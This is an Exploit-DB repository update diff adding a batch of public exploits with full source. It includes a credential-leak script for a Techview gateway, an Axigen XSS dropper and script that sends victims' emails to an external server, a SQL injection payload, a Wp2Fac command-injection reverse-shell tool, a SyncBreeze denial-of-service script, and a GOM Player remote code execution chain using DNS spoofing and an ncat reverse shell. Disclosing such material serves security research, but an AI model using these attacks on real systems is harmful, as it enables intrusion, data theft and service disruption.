DB: 2023-09-09

16 changes to exploits/shellcodes/ghdb

Techview LA-5570 Wireless Gateway Home Automation Controller - Multiple Vulnerabilities

Axigen < 10.3.3.47_ 10.2.3.12 - Reflected XSS

Drupal 10.1.2 - web-cache-poisoning-External-service-interaction

Jorani v1.0.3-(c)2014-2023 - XSS Reflected & Information Disclosure

soosyze 2.0.0 - File Upload

SPA-Cart eCommerce CMS 1.9.0.3 - SQL Injection

Wordpress Plugin Elementor 3.5.5 - Iframe Injection

Wp2Fac - OS Command Injection

Maltrail v0.53 - Unauthenticated Remote Code Execution (RCE)

SyncBreeze 15.2.24 - 'login' Denial of Service

GOM Player 2.3.90.5360 - Buffer Overflow (PoC)

GOM Player 2.3.90.5360 - Remote Code Execution (RCE)

Windows/x64 - PIC Null-Free TCP Reverse Shell Shellcode (476 Bytes)

exploits/hardware/remote/51720.py

@@ -0,0 +1,77 @@
+# Exploit Title: Techview LA-5570 Wireless Gateway Home Automation Controller - Multiple Vulnerabilities
+# Google Dork: N/A
+# Date: 25/08/2023
+# Exploit Author: The Security Team [exploitsecurity.io<http://exploitsecurity.io>]
+# Vendor Homepage: https://www.jaycar.com.au/wireless-gateway-home-automation-controller/p/LA5570
+# Software Link: N/A
+# Version: 1.0.19_T53
+# Tested on: MACOS/Linux
+# CVE : CVE-2023-34723
+# POC Code Available: https://www.exploitsecurity.io/post/cve-2023-34723-cve-2023-34724-cve-2023-34725
+
+#!/opt/homebrew/bin/python3
+
+import requests
+import sys
+from time import sleep
+from urllib3.exceptions import InsecureRequestWarning
+from colorama import init
+from colorama import Fore, Back, Style
+import re
+import os
+import ipaddress
+requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
+
+def banner():
+    if os.name == 'posix':
+        clr_cmd = ('clear')
+    elif os.name == 'nt':
+        clr_cmd = ('cls')
+    os.system(clr_cmd)
+    print ("[+]****************************************************[+]")
+    print (" | Author      : The Security Team                      |")
+    print (" | Company     : "+Fore.RED+ "Exploit Security" +Style.RESET_ALL+"\t\t\t|")
+    print (" | Description : TechVIEW LA-5570 Directory Traversal   |")
+    print (" | Usage       : "+sys.argv[0]+" <target>              |")
+    print ("[+]****************************************************[+]")
+
+def usage():
+    print (f"Usage: {sys.argv[0]} <target>")
+
+def main(target):
+    domain = "http://"+target+"/config/system.conf"
+    try:
+        url = domain.strip()
+        r = requests.get(url, verify=False, timeout=3)
+        print ("[+] Retrieving credentials", flush=True, end='')
+        sleep(1)
+        print(" .", flush=True, end='')
+        sleep(1)
+        print(" .", flush=True, end='')
+        sleep(1)
+        print(" .", flush=True, end='')
+        if ("system_password" in r.text):
+            data =  (r.text.split("\n"))
+            print (f"\n{data[1]}")
+        else:
+            print (Fore.RED + "[!] Target is not vulnerable !"+ Style.RESET_ALL)
+    except TimeoutError:
+        print (Fore.RED + "[!] Timeout connecting to target !"+ Style.RESET_ALL)
+    except KeyboardInterrupt:
+        return
+    except requests.exceptions.Timeout:
+        print (Fore.RED + "[!] Timeout connecting to target !"+ Style.RESET_ALL)
+        return
+
+if __name__ == '__main__':
+    if len(sys.argv)>1:
+        banner()
+        target = sys.argv[1]
+        try:
+            validate = ipaddress.ip_address(target)
+            if (validate):
+                main (target)
+        except ValueError as e:
+            print (Fore.RED + "[!] " + str(e) + " !" + Style.RESET_ALL)
+    else:
+        print (Fore.RED + f"[+] Not enough arguments, please specify target !" + Style.RESET_ALL)

exploits/multiple/webapps/51722.txt

@@ -0,0 +1,80 @@
+# Exploit Title: Axigen < 10.3.3.47, 10.2.3.12 - Reflected XSS
+# Google Dork: inurl:passwordexpired=yes
+# Date: 2023-08-21
+# Exploit Author: AmirZargham
+# Vendor Homepage: https://www.axigen.com/
+# Software Link: https://www.axigen.com/mail-server/download/
+# Version: (10.5.0–4370c946) and older version of Axigen WebMail
+# Tested on: firefox,chrome
+# CVE: CVE-2022-31470
+
+Exploit
+We use the second Reflected XSS to exploit this vulnerability, create a
+malicious link, and steal user emails.
+
+Dropper code
+This dropper code, loads and executes JavaScript exploit code from a remote
+server.
+
+');
+x = document.createElement('script');
+x.src = 'https://example.com/exploit.js';
+window.addEventListener('DOMContentLoaded',function y(){
+  document.body.appendChild(x)
+})//
+
+
+
+Encoded form
+
+/index.hsp?m=%27)%3Bx%3Ddocument.createElement(%27script%27)%3Bx.src%3D%27
+https://example.com/exploit.js%27%3Bwindow.addEventListener(%27DOMContentLoaded%27,function+y(){document.body.appendChild(x)})//
+
+
+Exploit code
+
+xhr1 = new XMLHttpRequest(), xhr2 = new XMLHttpRequest(), xhr3 = new
+XMLHttpRequest();
+oob_server = 'https://example.com/';
+var script_tag = document.createElement('script');
+
+xhr1.open('GET', '/', true);
+xhr1.onreadystatechange = () => {
+    if (xhr1.readyState === XMLHttpRequest.DONE) {
+        _h_cookie = new URL(xhr1.responseURL).search.split("=")[1];
+        xhr2.open('PATCH', `/api/v1/conversations/MQ/?_h=${_h_cookie}`,
+true);
+        xhr2.setRequestHeader('Content-Type', 'application/json');
+        xhr2.onreadystatechange = () => {
+            if (xhr2.readyState === XMLHttpRequest.DONE) {
+                if (xhr2.status === 401){
+                    script_tag.src =
+`${oob_server}?status=session_expired&domain=${document.domain}`;
+                    document.body.appendChild(script_tag);
+                } else {
+                    resp = xhr2.responseText;
+                    folderId = JSON.parse(resp)["mails"][0]["folderId"];
+                    xhr3.open('GET',
+`/api/v1/conversations?folderId=${folderId}&_h=${_h_cookie}`, true);
+                    xhr3.onreadystatechange = () => {
+                        if (xhr3.readyState === XMLHttpRequest.DONE) {
+                            emails = xhr3.responseText;
+                            script_tag.src =
+`${oob_server}?status=ok&domain=${document.domain}&emails=${btoa(emails)}`;
+                            document.body.appendChild(script_tag);
+                        }
+                    };
+                    xhr3.send();
+                }
+            }
+        };
+        var body = JSON.stringify({isUnread: false});
+        xhr2.send(body);
+    }
+};
+xhr1.send();
+
+
+Combining dropper and exploit
+You can host the exploit code somewhere and then address it in the dropper
+code.

exploits/php/webapps/51714.txt

@@ -0,0 +1,41 @@
+# Exploit Title: SPA-Cart eCommerce CMS 1.9.0.3 - SQL Injection
+# Exploit Author: CraCkEr
+# Date: 20/08/2023
+# Vendor: SPA-Cart
+# Vendor Homepage: https://spa-cart.com/
+# Software Link: https://demo.spa-cart.com/
+# Version: 1.9.0.3
+# Tested on: Windows 10 Pro
+# Impact: Database Access
+# CVE: CVE-2023-4548
+# CWE: CWE-89 / CWE-74 / CWE-707
+
+
+## Greetings
+
+The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka
+CryptoJob (Twitter) twitter.com/0x0CryptoJob
+
+
+## Description
+
+SQL injection attacks can allow unauthorized access to sensitive data, modification of
+data and crash the application or make it unavailable, leading to lost revenue and
+damage to a company's reputation.
+
+
+Path: /search
+
+GET parameter 'filter[brandid]' is vulnerable to SQL Injection
+
+https://website/search?filtered=1&q=11&load_filter=1&filter[brandid]=[SQLi]&filter[price]=100-500&filter[attr][Memory][]=500%20GB&filter[attr][Color][]=Black
+
+---
+Parameter: filter[brandid] (GET)
+    Type: time-based blind
+    Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
+    Payload: filtered=1&q=11&load_filter=1&filter[brandid]=4'XOR(SELECT(0)FROM(SELECT(SLEEP(7)))a)XOR'Z&filter[price]=100-500&filter[attr][Memory][]=500 GB&filter[attr][Color][]=Black
+---
+
+
+[-] Done

exploits/php/webapps/51715.txt

@@ -0,0 +1,108 @@
+## Title: Jorani v1.0.3-(c)2014-2023 - XSS Reflected & Information Disclosure
+## Author: nu11secur1ty
+## Date: 08/27/2023
+## Vendor: https://jorani.org/
+## Software: https://demo.jorani.org/session/login
+## Reference: https://portswigger.net/web-security/cross-site-scripting
+## Reference: https://portswigger.net/web-security/information-disclosure
+
+## Description:
+The value of the `language request` parameter is copied into a
+JavaScript string which is encapsulated in double quotation marks. The
+payload 75943";alert(1)//569 was submitted in the language parameter.
+This input was echoed unmodified in the application's response.
+The attacker can modify the token session and he can discover
+sensitive information for the server.
+
+STATUS: HIGH-Vulnerability
+
+[+]Exploit:
+```POST
+POST /session/login HTTP/1.1
+Host: demo.jorani.org
+Accept-Encoding: gzip, deflate
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Language: en-US;q=0.9,en;q=0.8
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
+AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.111
+Safari/537.36
+Connection: close
+Cache-Control: max-age=0
+Cookie: csrf_cookie_jorani=9b4b02ece59e0f321cd0324a633b5dd2;
+jorani_session=fbc630d2510ffdd2a981ccfe97301b1b90ab47dc#ATTACK
+Origin: http://demo.jorani.org
+Upgrade-Insecure-Requests: 1
+Referer: http://demo.jorani.org/session/login
+Content-Type: application/x-www-form-urlencoded
+Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="116", "Chromium";v="116"
+Sec-CH-UA-Platform: Windows
+Sec-CH-UA-Mobile: ?0
+Content-Length: 183
+
+csrf_test_jorani=9b4b02ece59e0f321cd0324a633b5dd2&last_page=session%2Flogin&language=en-GBarh5l%22%3e%3cscript%3ealert(document.cookie)%3c%2fscript%3ennois&login=bbalet&CipheredValue=
+
+```
+
+[+]Response:
+```HTTP
+HTTP/1.1 200 OK
+date: Sun, 27 Aug 2023 06:03:04 GMT
+content-type: text/html; charset=UTF-8
+Content-Length: 681
+server: Apache
+x-powered-by: PHP/8.2
+expires: Thu, 19 Nov 1981 08:52:00 GMT
+cache-control: no-store, no-cache, must-revalidate
+pragma: no-cache
+set-cookie: csrf_cookie_jorani=9b4b02ece59e0f321cd0324a633b5dd2;
+expires=Sun, 27 Aug 2023 08:03:04 GMT; Max-Age=7200; path=/;
+SameSite=Strict
+set-cookie: jorani_session=9ae823ffa74d722c809f6bda69954593483f2cfd;
+expires=Sun, 27 Aug 2023 08:03:04 GMT; Max-Age=7200; path=/; HttpOnly;
+SameSite=Lax
+last-modified: Sun, 27 Aug 2023 06:03:04 GMT
+vary: Accept-Encoding
+cache-control: private, no-cache, no-store, proxy-revalidate,
+no-transform, must-revalidate
+pragma: no-cache
+x-iplb-request-id: 3E497A1D:118A_D5BA2118:0050_64EAE718_12C0:1FBA1
+x-iplb-instance: 27474
+connection: close
+
+
+<div style="border:1px solid #990000;padding-left:20px;margin:0 0 10px 0;">
+
+<h4>A PHP Error was encountered</h4>
+
+<p>Severity: 8192</p>
+<p>Message:  strlen(): Passing null to parameter #1 ($string) of type
+string is deprecated</p>
+<p>Filename: controllers/Connection.php</p>
+<p>Line Number: 126</p>
+
+
+</div>
+<div style="border:1px solid #990000;padding-left:20px;margin:0 0 10px 0;">
+
+<h4>A PHP Error was encountered</h4>
+
+<p>Severity: Warning</p>
+<p>Message:  Cannot modify header information - headers already sent
+by (output started at
+/home/decouvric/demo.jorani.org/system/core/Exceptions.php:272)</p>
+<p>Filename: helpers/url_helper.php</p>
+<p>Line Number: 565</p>
+
+
+</div>
+```
+
+
+## Reproduce:
+[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/Jorani/2023/Jorani-v1.0.3-%C2%A92014-2023-Benjamin-BALET-XSS-Reflected-Information-Disclosure)
+
+## Proof and Exploit:
+[href](https://www.nu11secur1ty.com/2023/08/jorani-v103-2014-2023-benjamin-balet.html)
+
+## Time spend:
+01:35:00

exploits/php/webapps/51716.txt

@@ -0,0 +1,15 @@
+# Exploit Title: Wordpress Plugin Elementor < 3.5.5 - Iframe Injection
+# Date: 28.08.2023
+# Exploit Author: Miguel Santareno
+# Vendor Homepage: https://elementor.com/
+# Version: < 3.5.5
+# Tested on: Google and Firefox latest version
+# CVE : CVE-2022-4953
+
+# 1. Description
+The plugin does not filter out user-controlled URLs from being loaded into the DOM. This could be used to inject rogue iframes that point to malicious URLs.
+
+
+# 2. Proof of Concept (PoC)
+Proof of Concept:
+https://vulnerable-site.tld/#elementor-action:action=lightbox&settings=eyJ0eXBlIjoidmlkZW8iLCJ1cmwiOiJodHRwczovL2Rvd25sb2FkbW9yZXJhbS5jb20vIn0K

exploits/php/webapps/51717.py

@@ -0,0 +1,38 @@
+# Exploit Title: Wp2Fac v1.0 - OS Command Injection
+# Date: 2023-08-27
+# Exploit Author: Ahmet Ümit BAYRAM
+# Vendor: https://github.com/metinyesil/wp2fac
+# Tested on: Kali Linux & Windows 11
+# CVE: N/A
+
+import requests
+
+def send_post_request(host, revshell):
+    url = f'http://{host}/send.php'
+    headers = {
+        'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:102.0)
+Gecko/20100101 Firefox/102.0',
+        'Accept': '*/*',
+        'Accept-Language': 'en-US,en;q=0.5',
+        'Accept-Encoding': 'gzip, deflate',
+        'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
+        'X-Requested-With': 'XMLHttpRequest',
+        'Origin': f'http://{host}',
+        'Connection': 'close',
+        'Referer': f'http://{host}/',
+    }
+
+    data = {
+        'numara': f'1234567890 & {revshell} &;'
+    }
+
+    response = requests.post(url, headers=headers, data=data)
+    return response.text
+
+host = input("Target IP: ")
+
+revshell = input("Reverse Shell Command: ")
+
+print("Check your listener!")
+
+send_post_request(host, revshell)

exploits/php/webapps/51718.txt

@@ -0,0 +1,42 @@
+## Title: soosyze 2.0.0 - File Upload
+## Author: nu11secur1ty
+## Date: 04.26.2023-08.28.2023
+## Vendor: https://soosyze.com/
+## Software: https://github.com/soosyze/soosyze/releases/tag/2.0.0
+## Reference: https://portswigger.net/web-security/file-upload
+
+## Description:
+Broken file upload logic. The malicious user can upload whatever he
+wants to an HTML file and when he tries to execute it he views almost
+all
+file paths. This could be worse than ever, it depends on the scenario.
+
+STATUS: HIGH Vulnerability
+
+[+]Exploit:
+```HTML
+<!DOCTYPE html>
+<html>
+<head>
+<title>Hello broken file upload logic, now I can read your special
+directory pats, thank you ;)</title>
+</head>
+<body>
+<h1>
+	<?php
+		phpinfo();
+	?>
+	</h1>
+</body>
+</html>
+
+```
+
+## Reproduce:
+[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/soosyze/2023/soosyze-2.0.0)
+
+## Proof and Exploit:
+[href](https://www.nu11secur1ty.com/2023/05/soosyze-200-file-path-traversal-broken.html)
+
+## Time spend:
+01:27:00

exploits/php/webapps/51723.txt

@@ -0,0 +1,88 @@
+## Title: drupal-10.1.2 web-cache-poisoning-External-service-interaction
+## Author: nu11secur1ty
+## Date: 08/30/2023
+## Vendor: https://www.drupal.org/
+## Software: https://www.drupal.org/download
+## Reference: https://portswigger.net/kb/issues/00300210_external-service-interaction-http
+
+## Description:
+It is possible to induce the application to perform server-side HTTP
+requests to arbitrary domains.
+The payload d7lkti6pq8fjkx12ikwvye34ovuoie680wqjg75.oastify.com was
+submitted in the HTTP Host header.
+The application performed an HTTP request to the specified domain. For
+the second test, the attacker stored a response
+on the server with malicious content. This can be bad for a lot of
+users of this system if the attacker spreads a malicious URL
+and sends it by email etc. By using a redirect exploit.
+
+STATUS: HIGH-Vulnerability
+
+[+]Exploit:
+```GET
+GET /drupal/web/?psp4hw87ev=1 HTTP/1.1
+Host: d7lkti6pq8fjkx12ikwvye34ovuoie680wqjg75.oastify.com
+Accept-Encoding: gzip, deflate, psp4hw87ev
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7,
+text/psp4hw87ev
+Accept-Language: en-US,psp4hw87ev;q=0.9,en;q=0.8
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
+AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.111
+Safari/537.36 psp4hw87ev
+Connection: close
+Cache-Control: max-age=0
+Upgrade-Insecure-Requests: 1
+Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="116", "Chromium";v="116"
+Sec-CH-UA-Platform: Windows
+Sec-CH-UA-Mobile: ?0
+Origin: https://psp4hw87ev.pwnedhost.com
+```
+[+]Response from Burpcollaborator server:
+```HTTP
+HTTP/1.1 200 OK
+Server: Burp Collaborator https://burpcollaborator.net/
+X-Collaborator-Version: 4
+Content-Type: text/html
+Content-Length: 62
+
+<html><body>zeq5zcbz3x69x9a63ubxidzjlgigmmgifigz</body></html>
+```
+
+[+]Response from Attacker server
+```HTTP
+192.168.100.45 - - [30/Aug/2023 05:52:56] "GET
+/drupal/web/rss.xml?psp4hw87ev=1 HTTP/1.1"
+```
+
+## Reproduce:
+[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/DRUPAL/2013/drupal-10.1.2)
+
+## Proof and Exploit:
+[href](https://www.nu11secur1ty.com/2023/08/drupal-1012-web-cache-poisoning.html)
+
+## Time spend:
+03:35:00
+
+
+--
+System Administrator - Infrastructure Engineer
+Penetration Testing Engineer
+Exploit developer at https://packetstormsecurity.com/
+https://cve.mitre.org/index.htmlhttps://cxsecurity.com/ and
+https://www.exploit-db.com/
+0day Exploit DataBase https://0day.today/
+home page: https://www.nu11secur1ty.com/
+hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
+                          nu11secur1ty <http://nu11secur1ty.com/>
+
+
+--
+System Administrator - Infrastructure Engineer
+Penetration Testing Engineer
+Exploit developer at https://packetstormsecurity.com/
+https://cve.mitre.org/index.html
+https://cxsecurity.com/ and https://www.exploit-db.com/
+0day Exploit DataBase https://0day.today/
+home page: https://www.nu11secur1ty.com/
+hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
+                          nu11secur1ty <http://nu11secur1ty.com/>

exploits/python/webapps/51676.py

@@ -2,8 +2,6 @@
 # Exploit Author: Iyaad Luqman K (init_6)
 # Application: Maltrail v0.53
 # Tested on: Ubuntu 22.04
-# CVE: CVE-2023-27163
-
 
 # PoC
 import sys;

exploits/windows/dos/51725.py

@@ -0,0 +1,35 @@
+# Exploit Title: SyncBreeze 15.2.24 -'login' Denial of Service
+# Date: 30/08/2023
+# Exploit Author: mohamed youssef
+# Vendor Homepage: https://www.syncbreeze.com/
+# Software Link: https://www.syncbreeze.com/setups/syncbreeze_setup_v15.4.32.exe
+# Version: 15.2.24
+# Tested on: windows 10 64-bit
+import socket
+import time
+
+
+pyload="username=admin&password="+'password='*500+""
+request=""
+request+="POST /login HTTP/1.1\r\n"
+request+="Host: 192.168.217.135\r\n"
+request+="User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0\r\n"
+request+="Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\r\n"
+request+="Accept-Language: en-US,en;q=0.5\r\n"
+request+="Accept-Encoding: gzip, deflate\r\n"
+request+="Content-Type: application/x-www-form-urlencoded\r\n"
+request+="Content-Length: "+str(len(pyload))+"\r\n"
+request+="Origin: http://192.168.217.135\r\n"
+request+="Connection: keep-alive\r\n"
+request+="Referer: http://192.168.217.135/login\r\n"
+request+="Upgrade-Insecure-Requests: 1\r\n"
+request+="\r\n"
+request+=pyload
+
+print (request)
+s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
+s.connect(("192.168.217.135",80))
+s.send(request.encode())
+print (s.recv(1024))
+s.close()
+time.sleep(5)

exploits/windows/local/51724.py

@@ -0,0 +1,29 @@
+# Exploit Title: GOM Player 2.3.90.5360 - Buffer Overflow (PoC)
+# Discovered by: Ahmet Ümit BAYRAM
+# Discovered Date: 30.08.2023
+# Vendor Homepage: https://www.gomlab.com
+# Software Link: https://cdn.gomlab.com/gretech/player/GOMPLAYERGLOBALSETUP_NEW.EXE
+# Tested Version: 2.3.90.5360 (latest)
+# Tested on: Windows 11 64bit
+# Thanks to: M. Akil GÜNDOĞAN
+
+#  - Open GOM Player
+#  - Click on the gear icon above to open settings
+#  - From the menu that appears, select Audio
+#  - Click on Equalizer
+#  - Click on the plus sign to go to the "Add EQ preset" screen
+#  - Copy the contents of exploit.txt and paste it into the preset name box, then click OK
+#  - Crashed!
+
+#!/usr/bin/python
+
+exploit = 'A' * 260
+
+try:
+    file = open("exploit.txt","w")
+    file.write(exploit)
+    file.close()
+
+    print("POC is created")
+except:
+    print("POC is not created")

exploits/windows/remote/51719.py

@@ -0,0 +1,119 @@
+# Exploit Title: GOM Player 2.3.90.5360 - Remote Code Execution (RCE)
+# Date: 26.08.2023
+# Author: M. Akil Gündoğan
+# Contact: https://twitter.com/akilgundogan
+# Vendor Homepage: https://www.gomlab.com/gomplayer-media-player/
+# Software Link: https://cdn.gomlab.com/gretech/player/GOMPLAYERGLOBALSETUP_NEW.EXE
+# Version: 2.3.90.5360
+# Tested on: Windows 10 Pro x64 22H2 19045.3324
+# PoC Video: https://www.youtube.com/watch?v=8d0YUpdPzp8
+
+# Impacts: GOM player has been downloaded 63,952,102 times according to CNET. It is used by millions of people worldwide.
+
+# Vulnerability Description:
+# The IE component in the GOM Player's interface uses an insecure HTTP connection. Since IE is vulnerable to the
+# SMB/WebDAV+ "search-ms" technique, we can redirect the victim to the page we created with DNS spoofing and execute code on the target.
+# In addition, the URL+ZIP+VBS MoTW bypass technique was used to prevent the victim from seeing any warning in the pop-up window.
+
+# Full disclosure, developers should be more careful about software security.
+
+# Exploit Usage: Run it and enter the IP address of the target. Then specify the port to listen to for the reverse shell.
+
+# Some spaghetti and a bad code but it works :)
+
+banner = """\033[38;5;196m+-----------------------------------------------------------+
+|     GOM Player 2.3.90.5360 - Remote Code Execution        |
+|   Test edildi, sinifta kaldi. Bu oyun hic bitmeyecek :-)  |
++-----------------------------------------------------------+\033[0m""" +"""
+\033[38;5;117m[*]- Author: M. Akil Gundogan - rootkit.com.tr\n\033[0m"""
+
+import time,os,zipfile,subprocess,socket,sys
+
+print(banner)
+
+if os.geteuid() != 0:
+    print("You need root privileges to run the exploit, please use sudo...")
+    sys.exit(1)
+
+targetIP = input("- Target IP address: ")
+listenPort = input("- Listening port for Reverse Shell: ")
+
+def fCreate(fileName,fileContent): # File create func.
+    f = open(fileName,"w")
+    f.write(fileContent)
+    f.close()
+
+gw = os.popen("ip -4 route show default").read().split()
+s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
+s.connect((gw[2], 0))
+ipaddr = s.getsockname()[0]
+gateway = gw[2]
+host = socket.gethostname()
+print ("- My IP:", ipaddr, " Gateway:", gateway, " Host:", host)
+
+print("\n[*]- Stage 1: Downloading neccesary tools...")
+
+smbFolderName = "GomUpdater" # change this (optional)
+expWorkDir = "gomExploitDir" # change this (optional)
+os.system("mkdir " + expWorkDir +" >/dev/null 2>&1 &") # Creating a working directory for the exploit.
+time.sleep(1) # It's necessary for exploit stability.
+os.system("cd " + expWorkDir + "&& mkdir smb-shared web-shared >/dev/null 2>&1 &") # Creating a working directory for the exploit.
+time.sleep(1) # It's necessary for exploit stability.
+os.system("cd " + expWorkDir + "/smb-shared && wget https://nmap.org/dist/ncat-portable-5.59BETA1.zip >/dev/null 2>&1 && unzip -o -j ncat-portable-5.59BETA1.zip >/dev/null 2>&1 && rm -rf ncat-portable-5.59BETA1.zip README") #Downloading ncat
+print("    [*] - Ncat has been downloaded.")
+subprocess.run("git clone https://github.com/fortra/impacket.git " + expWorkDir + "/impacket >/dev/null 2>&1",shell=True) # Downloading Impacket
+print("    [*] - Impacket has been downloaded.")
+subprocess.run("git clone https://github.com/dtrecherel/DNSSpoof.git " + expWorkDir + "/dnsspoof >/dev/null 2>&1",shell=True) # Downloading DNSSpoof.py
+print("    [*] - DNSSpoof.py has been downloaded.")
+
+print("[*]- Stage 2: Creating Attacker SMB Server...")
+subprocess.Popen("cd gomExploitDir/impacket/examples && python3 smbserver.py "+smbFolderName+" ../../smb-shared -smb2support >/dev/null 2>&1",shell=True) # Running SMB server.
+time.sleep(5) # It's necessary for exploit stability.
+
+smbIP = ipaddr
+spoofUrl = "playinfo.gomlab.com" # Web page that causes vulnerability because it is used as HTTP
+
+print("[*]- Stage 3: Creating Attacker Web Page...")
+
+# change this (optional)
+screenExpPage = """
+<meta charset="utf-8">
+<script> window.alert("GOM Player için acil güncelleme yapılmalı ! Açılan pencerede lütfen updater'a tıklayın.");</script>
+<script>window.location.href= 'search-ms:displayname=GOM Player Updater&crumb=System.Generic.String%3AUpdater&crumb=location:%5C%5C"""+smbIP+"""';
+</script>
+"""
+
+fCreate(expWorkDir + "/web-shared/screen.html",screenExpPage)
+time.sleep(3) # It's necessary for exploit stability.
+
+print("[*]- Stage 4: Creating URL+VBS for MoTW bypass placing it into the ZIP archive...")
+vbsCommand = '''Set shell=CreateObject("wscript.shell")
+Shell.Run("xcopy /y \\\\yogurt\\ayran\\ncat.exe %temp%")
+WScript.Sleep 5000
+Shell.Run("cmd /c start /min cmd /c %temp%\\ncat.exe attackerIP attackerPort -e cmd")''' # change this (optional)
+vbsCommand = vbsCommand.replace("yogurt", smbIP).replace("ayran", smbFolderName).replace("attackerIP",smbIP).replace("attackerPort",listenPort)
+fCreate(expWorkDir + "/payload.vbs",vbsCommand)
+
+urlShortcut = '''[InternetShortcut]
+URL=file://'''+smbIP+"/"+smbFolderName+'''/archive.zip/payload.vbs
+IDlist='''
+fCreate(expWorkDir + "/smb-shared/Updater.url",urlShortcut)
+time.sleep(3) # It's necessary for exploit stability.
+zipName = expWorkDir + "/smb-shared/archive.zip"
+payload_filename = os.path.join(expWorkDir, "payload.vbs")
+
+with zipfile.ZipFile(zipName, "w") as malzip:
+    malzip.write(payload_filename, arcname=os.path.basename(payload_filename))
+
+print("[*]- Stage 5: Running the attacker's web server...")
+subprocess.Popen("cd " + expWorkDir + "/web-shared && python3 -m http.server 80 >/dev/null 2>&1",shell=True) # Running attacker web server with Python mini http.server
+time.sleep(3) # It's necessary for exploit stability.
+
+print("[*]- Stage 6: Performing DNS and ARP spoofing for the target...")
+subprocess.Popen("python3 " + expWorkDir + "/dnsspoof/dnsspoof.py -d " + spoofUrl + " -t " + targetIP + ">/dev/null 2>&1",shell=True) # DNS Spoofing...
+time.sleep(10) # It's neccesary for exploit stability.
+os.system("ping -c 5 " + targetIP + " >/dev/null 2>&1 &") # Ping the target...
+os.system("arping -c 5 " + targetIP + " >/dev/null 2>&1 &") # ARPing the target.
+print("[*]- Stage 7: Waiting for the target to open GOM Player and execute the malicious URL shortcut...\n")
+subprocess.run("nc -lvnp " + listenPort,shell=True)
+subprocess.run("pkill -f smbserver.py & pkill -f http.server & pkill -f dnsspoof.py",shell=True) # Closing background processes after exploitation...

files_exploits.csv

@@ -3924,6 +3924,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 44577,exploits/hardware/remote/44577.py,"TBK DVR4104 / DVR4216 - Credentials Leak",2018-05-02,ezelf,remote,hardware,,2018-05-03,2018-05-03,0,CVE-2018-9995,,,,,https://github.com/ezelf/CVE-2018-9995_dvr_credentials/blob/529a711e3db8c7265473bf122276fb295e5b973d/getDVR_Credentials.py
 43384,exploits/hardware/remote/43384.py,"Technicolor DPC3928SL - SNMP Authentication Bypass",2017-05-05,nixawk,remote,hardware,,2017-12-21,2017-12-21,0,CVE-2017-5135,,Stringbleed,,,https://github.com/nixawk/labs/blob/47d72af5b69bd4d2ec411b38313d33111a063c97/CVE-2017-5135/StringBleed-CVE-2017-5135.py
 35620,exploits/hardware/remote/35620.txt,"Technicolor THOMSON TG585v7 Wireless Router - 'url' Cross-Site Scripting",2011-04-15,"Edgard Chammas",remote,hardware,,2011-04-15,2014-12-26,1,,,,,,https://www.securityfocus.com/bid/47390/info
+51720,exploits/hardware/remote/51720.py,"Techview LA-5570 Wireless Gateway Home Automation Controller - Multiple Vulnerabilities",2023-09-08,"The Security Team [exploitsecurity.io]",remote,hardware,,2023-09-08,2023-09-08,0,CVE-2023-34723,,,,,
 20806,exploits/hardware/remote/20806.txt,"Tektronix Phaser 740/750/850/930 - Network Printer Administration Interface",2001-04-25,Ltlw0lf,remote,hardware,,2001-04-25,2012-08-25,1,CVE-2001-0484;OSVDB-551,,,,,https://www.securityfocus.com/bid/2659/info
 19632,exploits/hardware/remote/19632.txt,"Tektronix Phaser Network Printer 740/750/750DP/840/930 PhaserLink WebServer - Retrieve Administrator Password",1999-11-17,"Dennis W. Mattison",remote,hardware,,1999-11-17,2012-07-06,1,CVE-1999-1508;OSVDB-113,,,,,https://www.securityfocus.com/bid/806/info
 6750,exploits/hardware/remote/6750.txt,"Telecom Italia Alice Pirelli routers - Backdoor from internal LAN/WAN",2008-10-14,"saxdax & drpepperONE",remote,hardware,,2008-10-13,,1,OSVDB-49193,,,,,
@@ -11639,6 +11640,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 18117,exploits/multiple/webapps/18117.txt,"Authenex A-Key/ASAS Web Management Control 3.1.0.2 - Blind SQL Injection",2011-11-15,"Jose Carlos de Arriba",webapps,multiple,,2011-11-19,2017-11-06,0,CVE-2011-4801;OSVDB-75656,,,,,
 50955,exploits/multiple/webapps/50955.txt,"Avantune Genialcloud ProJ 10 - Cross-Site Scripting (XSS)",2022-06-14,"Andrea Intilangelo",webapps,multiple,,2022-06-14,2022-06-14,0,CVE-2022-29296,,,,,
 48581,exploits/multiple/webapps/48581.txt,"Avaya IP Office 11 - Password Disclosure",2020-06-12,hyp3rlinx,webapps,multiple,,2020-06-12,2020-06-12,0,CVE-2020-7030,,,,,
+51722,exploits/multiple/webapps/51722.txt,"Axigen < 10.3.3.47_ 10.2.3.12 - Reflected XSS",2023-09-08,AmirZargham,webapps,multiple,,2023-09-08,2023-09-08,0,CVE-2022-31470,,,,,
